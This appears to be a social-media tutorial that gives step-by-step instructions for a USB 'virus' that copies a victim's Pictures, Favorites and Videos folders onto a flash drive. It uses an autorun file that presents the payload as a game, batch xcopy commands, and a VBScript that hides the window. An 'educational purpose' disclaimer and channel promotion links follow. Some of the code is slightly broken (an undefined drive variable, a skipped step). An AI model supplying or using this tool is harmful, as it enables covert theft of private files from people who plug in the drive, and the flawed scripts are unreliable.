Hacking Pictures from usb
## Hacking Pictures from usb .
lets start.
Step 1: Create Autorun File for the Flash Drive
open the notepad write that code and saveas Autorun.inf
as shown in pic given below
[autorun]
icon=drive.ico
open=launch.bat
action=Click ok to Run game for Windows
shell\open\command=launch.bat
Step 2: Make the File for Copy of Documents to Drive
open the notepad write that code and saveas file.bat
as shown in pic given below
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
Step 3: Make Vb Script to Run Batch File As Invisible
open the notepad write that code and saveas invisible.vbs
as shown in pic given below
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Step 4: Make a Batch File to Launch Vb Script and File.batch
open the notepad write that code and saveas launch.bat
as shown in pic given below
wscript.exe \invisible.vbs file.bat
Step 5: Create Folder to Save Files Withing usb Drive
Step 7: Put All Files of codes which have we save above in usb drive and Try Out
thats It
NOTE:
This virus is for just educational purpose
View my Youtube Channel and Subscribe me : click here
View My Facebook Page Follow Me : click here
View my blog and like also : click here
I just follow you and like posts, please follow me back.